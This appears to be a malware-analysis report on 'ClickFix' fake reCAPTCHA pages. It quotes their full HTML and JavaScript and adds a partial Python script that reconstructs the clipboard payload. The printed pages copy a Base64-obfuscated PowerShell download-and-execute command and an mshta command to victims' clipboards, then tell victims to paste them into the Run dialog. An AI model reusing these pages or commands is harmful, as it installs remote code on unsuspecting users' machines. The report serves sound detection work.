POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
{ "URL": "http://82.146.62.232/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
http://101.32.40.22/
Total findings: 4
Indicators of Compromise
Malicious Code Sample
JSON Technical Data
{ "URL": "http://101.32.40.22/", "URLs": [ "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png", "https://www.google.com/intl/en/policies/privacy/", "https://www.google.com/intl/en/policies/terms/" ], "ClipboardCommands": "mshta ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...dy.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextAr..." ], "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { chec", "} function hideCaptchaCheckbox() { chec", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let check", "let checkboxBtn = document.getElementById(\"checkbox\"); let check", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let verif", "let verifywindow = document.getElementById(\"verify-window\"); function", "mber(); document.getElementById('verification-id').textContent = veri", "lect(); document.execCommand(\"copy\"); docu", "tempTextArea.select(); docume", "</div> <script> let checkbo" ], "HTML": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <title>reCAPTCHA Verification</title>\n\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \n <style>\n .container {\n font-family: Roboto, helvetica, arial, sans-serif;\n }\n\n .m-p {\n margin: 0;\n padding: 0;\n }\n\n .block {\n display: block;\n }\n\n code {\n font-size: 9px;\n margin-left: 2px;\n color: gray;\n }\n\n .line-normal {\n line-height: normal;\n }\n\n .checkbox-window {\n height: 74px;\n width: 300px;\n background-color: #f9f9f9;\n border-radius: 3px;\n border: 1px solid #d3d3d3;\n }\n\n 
.checkbox-window a {\n color: #555;\n text-decoration: none;\n }\n\n .checkbox-window a:hover {\n color: #555;\n text-decoration: underline;\n }\n\n .checkbox-container {\n width: 28px;\n height: 28px;\n }\n\n .checkbox {\n position: relative;\n background-color: #fff;\n border-radius: 2px;\n height: 100%;\n width: 100%;\n border: 2px solid #c1c1c1;\n margin: 21px 0 0 12px;\n outline: none;\n font-family: Roboto, helvetica, arial, sans-serif;\n transition: width 500ms, height 500ms, border-radius 500ms, margin-top 500ms, margin-left 500ms, opacity 700ms;\n }\n\n .checkbox:hover {\n border: 2px solid #b2b2b2;\n }\n\n .im-not-a-robot {\n position: relative;\n left: 52px;\n bottom: 3px;\n font-size: 15px;\n color: #282727;\n }\n\n .captcha-logo {\n position: relative;\n\n left: 244px;\n bottom: 36px;\n width: 40px;\n height: 45px;\n vertical-align: baseline;\n padding-bottom: 4px;\n }\n\n\n .checkbox-desc {\n color: #555555;\n position: relative;\n font-size: 8px;\n text-align: center;\n bottom: 40px;\n left: 112px;\n }\n\n .spinner {\n visibility: hidden;\n position: relative;\n top: -85px;\n left: 12px;\n height: 20px;\n width: 20px;\n border: 2px solid rgba(0, 0, 0, 0.1);\n border-top: 2px solid #333;\n border-radius: 50%;\n visibility: hidden;\n opacity: 0;\n transition: opacity 0.5s linear;\n animation: spin 1s linear infinite;\n }\n\n @keyframes spin {\n 0% {\n transform: rotate(0deg);\n }\n\n 100% {\n transform: rotate(360deg);\n }\n }\n\n .verify-window {\n font-family: Roboto, helvetica, arial, sans-serif;\n opacity: 0;\n position: absolute;\n visibility: hidden;\n margin: auto;\n width: 310px;\n background-color: #fff;\n border: 1px solid #cecece;\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\n transition: opacity 400ms;\n }\n\n ol {\n counter-reset: item;\n list-style-type: none;\n list-style-position: outside; \n padding-left: 0;\n\n }\n\n ol li {\n counter-increment: item;\n margin-bottom: 
10px;\n\n }\n\n ol li::before {\n content: counter(item) \". \";\n color: #1A73E8;\n font-weight: bold;\n margin-right: 10px;\n margin-left: 10px;\n }\n\n .verify-container {\n padding: 8px;\n }\n\n .verify-header {\n background-color: #1A73E8;\n padding: 16px 16px 24px 16px;\n color: #fff;\n }\n\n .verify-header-text-small {\n font-size: 14px;\n line-height: normal;\n }\n\n .verify-header-text-medium {\n font-size: 16px;\n }\n\n .verify-header-text-big {\n font-size: 24px;\n font-weight: 700;\n }\n\n .verify-main {\n padding: 5px;\n color: #111;\n font-size: 13px;\n\n }\n\n .verify-footer {\n border-top: 1px solid #cecece;\n padding: 10px 7px 10px 7px;\n color: #737373;\n display: grid;\n grid-template-columns: auto 102px;\n font-size: 13px;\n }\n\n .verify-footer-left {\n padding: 5px;\n }\n\n .verify-verify-button {\n text-transform: uppercase;\n background-color: #5a89e2;\n color: #fff;\n text-align: center;\n width: 100%;\n padding: 12px 0 12px 0;\n text-decoration: none;\n font-weight: 600;\n height: min-content;\n border-radius: 3px;\n font-size: 14px;\n border: none;\n outline: none;\n cursor: not-allowed;\n }\n </style>\n </head>\n <body>\n\n <div class=\"container m-p\"> \n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\n <div class=\"checkbox-container m-p\">\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\n </div>\n <p class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\n <br>\n <p class=\"checkbox-desc m-p line-normal\">\n <a href=\"https://www.google.com/intl/en/policies/privacy/\">Privacy</a> - <a href=\"https://www.google.com/intl/en/policies/terms/\">Terms</a>\n </p>\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\n </div>\n \n <div id=\"verify-window\" class=\"verify-window\">\n <div class=\"verify-container\">\n <header class=\"verify-header\">\n <span 
class=\"verify-header-text-medium m-p block\">\u5b8c\u6210\u8fd9\u4e9b</span>\n <span class=\"verify-header-text-big m-p block\">\u9a8c\u8bc1\u6b65\u9aa4</span>\n <span class=\"verify-header-text-medium m-p block\"></span>\n </header>\n <main class=\"verify-main\">\n <p>\n \u4e3a\u4e86\u66f4\u597d\u7684\u8bc1\u660e\u60a8\u4e0d\u662f\u673a\u5668\u4eba\uff0c\u8bf7:\n </p>\n <ol>\n <li>\n \u6309\u4f4fWindows\u952e <i class=\"fab fa-windows\"></i> + <b>R</b>\u3002\n </li>\n \n <li>\n \u5728\u9a8c\u8bc1\u7a97\u53e3\u4e2d\uff0c\u6309 <b>Ctrl</b> + <b>V</b>\u3002\n </li>\n\n <li>\n \u6309\u4e0b\u952e\u76d8\u4e0a\u7684 <b>Enter</b> \u952e\u5b8c\u6210\u3002\n </li>\n </ol>\n <p>\n \u60a8\u5c06\u9075\u5b88\u5e76\u540c\u610f:\n <br>\n <code>\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\n </code>\n </p>\n\n \n </main>\n </div>\n <footer class=\"verify-container verify-footer\">\n <div class=\"verify-footer-left\">\n \u6267\u884c\u4e0a\u8ff0\u6b65\u9aa4\u5373\u53ef\u5b8c\u6210\u9a8c\u8bc1\u3002\n </div>\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">\u9a8c\u8bc1</button>\n </footer>\n </div> \n </div>\n\n <script>\n let checkboxWindow = document.getElementById(\"checkbox-window\");\n let checkboxBtn = document.getElementById(\"checkbox\");\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\n let verifywindow = document.getElementById(\"verify-window\");\n\n function addCaptchaListeners() {\n if (checkboxBtn) {\n document.addEventListener(\"click\", function (event) {\n let path = event.composedPath();\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\n closeverifywindow();\n }\n });\n checkboxBtn.addEventListener(\"click\", function (event) {\n event.preventDefault();\n checkboxBtn.disabled = true;\n runClickedCheckboxEffects();\n });\n }\n }\n\n function runClickedCheckboxEffects() {\n hideCaptchaCheckbox();\n 
setTimeout(function(){\n showCaptchaLoading();\n },500);\n setTimeout(function(){\n showVerifyWindow();\n },900)\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.opacity = \"0\";\n checkboxBtnSpinner.style.animation = \"none\";\n setTimeout(function() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n }, 500);\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.visibility = \"hidden\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n\n function showCaptchaCheckbox() {\n checkboxBtn.style.width = \"100%\";\n checkboxBtn.style.height = \"100%\";\n checkboxBtn.style.borderRadius = \"2px\";\n checkboxBtn.style.margin = \"21px 0 0 12px\";\n checkboxBtn.style.opacity = \"1\";\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.width = \"4px\";\n checkboxBtn.style.height = \"4px\";\n checkboxBtn.style.borderRadius = \"50%\";\n checkboxBtn.style.marginLeft = \"25px\";\n checkboxBtn.style.marginTop = \"33px\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n checkboxBtnSpinner.style.opacity = \"0\";\n }\n\n function generateRandomNumber() {\n const min = 1000; \n const max = 9999;\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\n }\n\n function closeverifywindow() {\n verifywindow.style.display = \"none\";\n verifywindow.style.visibility = \"hidden\";\n verifywindow.style.opacity = \"0\";\n\n showCaptchaCheckbox();\n hideCaptchaLoading();\n checkboxBtn.disabled = false;\n }\n\n function isverifywindowVisible() {\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== 
\"\";\n }\n\n function setClipboardCopyData(textToCopy){\n const tempTextArea = document.createElement(\"textarea\");\n tempTextArea.value = textToCopy;\n document.body.append(tempTextArea);\n tempTextArea.select();\n document.execCommand(\"copy\");\n document.body.removeChild(tempTextArea);\n }\n\n function stageClipboard(commandToRun, verification_id){\n const suffix = \" # \"\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\n const end = \"''\"\n const textToCopy = commandToRun + suffix + ploy + verification_id + end\n\n setClipboardCopyData(textToCopy);\n }\n\n\n function showVerifyWindow() {\n verifywindow.style.display = \"block\";\n verifywindow.style.visibility = \"visible\";\n verifywindow.style.opacity = \"1\";\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\n\n if (verifywindow.offsetTop < 5) {\n verifywindow.style.top = \"5px\";\n }\n\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth-10 ) {\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\n }\n\n var verification_id = generateRandomNumber();\n document.getElementById('verification-id').textContent = verification_id;\n \n const htaPath = window.location.origin + \"/recaptcha-verify\";\n const commandToRun = \"mshta \" + htaPath\n stageClipboard(commandToRun, verification_id)\n }\n\n addCaptchaListeners();\n\n </script>\n </body>\n</html>\n", "ThreatLevel": "High" }
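The JSON above records `"ClipboardCommands": "mshta "` but not the full text the page copies. Following the script by hand: `stageClipboard` concatenates `"mshta " + window.location.origin + "/recaptcha-verify"`, the separator `" # "`, the ✅ decoy line and a random four-digit ID, then copies the result via a temporary textarea and `document.execCommand("copy")`; the verify window's instructions (in Chinese) tell the victim to press Windows + R, then Ctrl + V, then Enter. The script below is an added example, not ClickGrab's or the report's own code: it statically evaluates every string binding built by concatenation in the page's scripts, in any declaration order, and reports the pasted command, the URL the victim's machine would actually request and the decoy tail. `SAMPLE_HTML` is a constructed, trimmed imitation of the captured page; the origin `http://101.32.40.22` is passed in by the caller because the page takes it from `window.location.origin`, and runtime values such as the random ID are rendered as `{name}` placeholders.

```python
"""Reconstruct what a ClickFix page stages in the victim's clipboard.
Added example for this report, not ClickGrab's own code. SAMPLE_HTML is a constructed,
trimmed imitation of the 101.32.40.22 capture (same variable names and concatenation
pattern); the caller supplies the origin, which the page takes from window.location.origin."""
import re
from urllib.parse import urlsplit, urlunsplit

# Windows binaries that commonly lead a pasted ClickFix command.
LOLBINS = {"mshta", "powershell", "pwsh", "cmd", "curl", "certutil", "rundll32",
           "regsvr32", "bitsadmin", "msiexec", "wscript", "cscript"}
CLIPBOARD_WRITE = re.compile(r"""execCommand\(\s*["']copy["']\s*\)|clipboard\.writeText\(""")
DECL = re.compile(r"\b(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=\s*([^;\n]+)")  # name = <expr>
# One token of a pure concatenation: "..." | '...' | identifier(.member)* | +
TOKEN = re.compile(r"""\s*(?:"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'|([A-Za-z_$][\w$.]*)|(\+))""")

SAMPLE_HTML = r"""<!DOCTYPE html><html><head><title>reCAPTCHA Verification</title></head><body>
<code>✅ "I am not a robot - reCAPTCHA Verification ID: <span id="verification-id">146820</span>"</code>
<script>
  function setClipboardCopyData(textToCopy){
    const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy;
    document.body.append(tempTextArea); tempTextArea.select();
    document.execCommand("copy"); document.body.removeChild(tempTextArea);
  }
  function stageClipboard(commandToRun, verification_id){
    const suffix = " # "
    const ploy = "✅ ''I am not a robot - reCAPTCHA Verification ID: "
    const end = "''"
    const textToCopy = commandToRun + suffix + ploy + verification_id + end
    setClipboardCopyData(textToCopy);
  }
  function showVerifyWindow() {
    var verification_id = generateRandomNumber();
    const htaPath = window.location.origin + "/recaptcha-verify";
    const commandToRun = "mshta " + htaPath
    stageClipboard(commandToRun, verification_id)
  }
</script></body></html>"""

def _tokens(expr):
    """Tokenise `a + "b" + c`; None for anything else (a call, a number), which is ignored."""
    out, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            return None
        dq, sq, ident, plus = m.groups()
        if plus:
            out.append(("op", "+"))
        elif ident is not None:
            out.append(("id", ident))
        else:  # undo the escapes a JS literal can carry
            raw = dq if dq is not None else sq
            out.append(("str", re.sub(r"\\(.)", lambda e: {"n": "\n"}.get(e.group(1), e.group(1)), raw)))
        pos = m.end()
    # Operands and '+' must alternate, starting and ending with an operand.
    if len(out) % 2 == 0 or any((k == "op") != (i % 2 == 1) for i, (k, _) in enumerate(out)):
        return None
    return out

def resolve_strings(js, origin):
    """Statically evaluate every string built by concatenation, in any declaration order;
    parameters and runtime values such as the random ID become `{name}` placeholders."""
    decls = {}
    for name, expr in DECL.findall(js):
        toks = _tokens(expr)
        if toks is not None:
            decls.setdefault(name, toks)

    def value(name, stack=()):
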